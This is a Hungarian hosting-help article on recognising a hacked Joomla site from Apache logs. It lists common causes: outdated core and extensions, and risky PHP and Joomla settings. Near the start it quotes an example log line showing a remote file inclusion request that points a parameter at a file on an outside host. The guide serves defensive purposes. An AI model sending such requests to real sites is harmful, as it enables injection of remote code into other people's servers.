Ha valamiért elkezdesz gyanakodni, hogy esetleg feltörték az oldaladat, az első, amit érdemes megnézni, a Statisztikai logok menüpontban a Mentett Apache logok a DirectAdmin felületén. Próbálj ehhez hasonló szokatlan  lekérdezéseket keresni benne:

192.168.0.1 – –

[29/Oct/2008:06:07:30 -0500] “GET /index.php?live_site=domain.com/1.txt?? HTTP/1.1″ 200 10864 “-” “Firefox”

Sajnos nem minden esetben olyan egyszerű megtalálni a nyomát egy támadásnak, és dekódolni azt. Egy ilyen feladat komolyabb fejlesztői tapasztalatot és sok időt kíván. Emiatt érdemes azonban tudni a leggyakoribb okokat, amiért egy Joomla oldalt feltörhetnek:

  1. A használatban lévő Joomla-telepítés leavult.
    A korábbi verzióknak komoly sebezhetőségei vannak, amelyeket könnyen kihasználhatnak.
    Egyszerűen ellenőrizheted az aktuális Joomla-verziódat, ha belépsz az admin-felületre, ott látni fogod a verziószámot.
    Ha nem a létező legújabbat használod, akkor mindenképpen frissítened kell!
  2. Elavultak az utólagosan telepített, hozzáadott bővítmények /modulok.
    Ez egy nagyon gyakori, és sajnos, sokszor figyelmen kívül hagyott probléma. Nagyon is fontos, alapvető kell legyen, hogy figyelemmel kísérjük az összes extra komponenst, modult, és mindig győződjünk meg róla, hogy a lehető legfrissebb változatukat használjuk.
    Nézd meg a bővítmények saját weboldalát, biztosan találsz információkat a gyakoribb biztonsági problémákról, és a frissítési lehetőségekről.
  3. Gyakori hibás konfigurálások, amik ismert biztonsági réseket nyithatnak meg:
  • register_globals bekapcsolva a PHP-konfigurációban – ha be van kapcsolva, lehetővé teszi az egyes változók “megmérgezését”;
  • mindenképp kapcsold ki;- allow_url_include bekapcsolva a PHP-konfigurációban – ha be van kapcsolva, lehetővé teszi távoli kódok beültetését a szkriptekbe; mindenképp kapcsold ki;
  • az alapértelemzett _jos prefix használata. Ez kinyitja az ajtót az összes MySQL-injekció előtt;
  • mindenképp cseréld le ezt prefixet valami bonyolultabbra, amit nehezebb kitalálni;
  • RG_EMULATION bekapcsolva a Joomla 1.0.* esetében – veszélyes opció; ha engedélyezve van, és bejelentkezel az admin-felületre, azonnal látni fogsz egy figyelmeztetést; kikapcsolhatod, ha a következő sort hozzáadod valahol középtájt a config.php fájlban:
    if(!defined(‘RG_EMULATION’)) { define( ‘RG_EMULATION’, 0 ); }

Ha a Joomla oldalad már biztosan fel van törve, lehet, hogy szükséged lesz a szolgáltatód segítségére is…